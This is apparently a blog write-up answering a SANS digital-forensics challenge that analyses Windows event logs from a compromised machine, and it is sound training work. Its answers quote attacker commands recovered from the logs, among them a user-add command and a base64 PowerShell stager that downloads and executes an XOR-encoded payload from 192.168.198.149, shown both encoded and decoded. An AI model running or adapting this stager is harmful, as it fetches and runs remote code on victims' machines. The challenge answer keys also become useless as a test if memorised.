These weren't too bad because as long as you downloaded them on a Mac or Linux, which downloads the actual file, and put them on a Windows 7+ VM, then all you had to do was double click the file in the Windows VM and the program that you needed was automatically loaded. The only two where you couldn't find the answer in the event logs were the powershell questions where you had to study the security2.evtx. You had to Base64 decode the Base64 encoded string in the Powershell command and it gave you the User-Agent. You also had to use that same method to find the IP Address. The others were straight forward if you were looking for them.
What's the secret word for SANS San Diego 2016 day 4?
watchersonthefirewall
Group add - (5 pts)
The following series of questions are based on these two Windows event logs:
https://sanschallenge.org/files/sanschallenge-security.evtx
https://sanschallenge.org/files/sanschallenge-system.evtx
They are the security and system event logs from a compromised Windows 7 system. Analyze these files on a Windows 7+ system.
Part of your challenge requires you to determine which event log to use to answer each question.
What is the Security ID of the user added to a security-enabled local group?
Answer with the complete security ID, for example:
S-1-5-21-1234567890-1234567890-1234567890-1234
security.evtx
S-1-5-21-3463664321-2923530833-3546627382-1007
Name that password - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
What is rachel's password?
security.evtx
Suspicious service - (5 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
There is a command in one of the logs
net user rachel replicant2 /add
This is a command to add a user and a password to the SAM database.
replicant2
A suspicious service was created, with a 16-character service name. What is the name of the service? The answer is a 16 character string, with mixed case.
Suspicious pipe - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
A suspicious pipe was created: what is the name of the pipe? Answer with the name itself, and omit any directories. For example, if the pipe is: \\.\pipe\name
...the answer would be "name" without the quotes.
This was found in another command. cmd.exe /c echo uxjxtu > \\.\pipe\uxjxtu
uxjxtu
Name that VBS - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
A suspicious VBScript is run from a temporary folder. What is the name of the .vbs script?
Include the .vbs script name only, preserve the case, and omit the directory. For example, if the path was:
C:\Windows\TEMP\ExAmPLe.vbs
...the answer would be 'ExAmPLe.vbs without the quotes.
Not rocket science. The only one in the security.evtx that I could find that was run out of a temp directory.
WvkkaCoF.vbs
Name that EXE - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
A suspicious executable is run from a temporary folder. What is the name of the executable? Include the EXE name only, preserve the case, and omit the directory. For example, if the path was:
C:\Windows\Temp\asdfgh\ExAmPLe.exe
...the answer would be 'ExAmPLe.exe' without the quotes.
This was the only one in the security.evtx that I could find that was run out of a temp directory. ZaCVvSRkGaIJZ.exe
Source Workstation - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
What is the name of the Source Workstation that created the event: "The computer attempted to validate the credentials for an account"? The answer is a mixed case string.
So yet again, this one was in the security.evtx. ZgTtCUS6fFdExXeu
Compromised user - (5 pts)
The next series of questions are based on the following evtx file:
https://sanschallenge.org/files/sanschallenge2-security.evtx
Notice the "2" in the name, this is a different file than the one analyzed in the previous series of questions.
A PowerShell-based post exploitation framework is launched via "launcher.bat". What is the account name of the user that ran launcher.bat? The account name is a string, mixed case.
IEUser
If you base64 decode this, it gives the answer to the next two questions. It was found in the powershell command in the 2-security.evtx.
JAB3AEMAPQBOAGUAVwAtAE8AYgBKAGUAYwBUACAAUwB5AHMAdABlAG0ALgBOAGUAVAAuAFcAZQBiAEMATABJAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUABSAG8AWABZACAAPQAgAFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFcARQBCAFIARQBRAFUAZQBTAFQAXQA6ADoARABFAEYAQQB1AEwAVABXAGUAYgBQAFIAbwB4AFkAOwAkAFcAQwAuAFAAUgBvAHgAeQAuAEMAUgBFAGQAZQBuAHQAaQBBAGwAcwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBlAFQALgBDAHIAZQBEAEUAbgBUAGkAYQBsAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AFcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEATABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAFIAWwBdAF0AJABiAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAFcAQwAuAEQATwBXAE4ATABPAGEAZABTAFQAUgBJAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABrAFsAJABpACsAKwAlACQASwAuAEwARQBuAEcAVABIAF0AfQA7AEkARQBYACAAKAAkAGIALQBqAE8ASQBuACcAJwApAA==
$wC=NeW-ObJecT System.NeT.WebCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEAdErs.ADd('User-Agent',$u);$wc.PRoXY = [SystEm.NET.WEBREQUeST]::DEFAuLTWebPRoxY;$WC.PRoxy.CREdentiAls = [SYsTEM.NeT.CreDEnTialCaChe]::DefaultNetWorKCREdenTIaLS;$K=')0dhCy1J9s3qY@%L!7pu]T|vV}tn[AQR';$i=0;[CHAR[]]$b=([cHaR[]]($WC.DOWNLOadSTRInG("http://192.168.198.149:8080/index.asp")))|%{$_-BXoR$k[$i++%$K.LEnGTH]};IEX ($b-jOIn'')
User-Agent - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx
The PowerShell-based post exploitation framework manually sets a user agent. What is the user agent?
IP address - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
What IP address is index.asp downloaded from? Respond with the IPv4 address is dotted quad format, for example "192.168.1.2" without the quotes.
192.168.198.149
No comments:
Post a Comment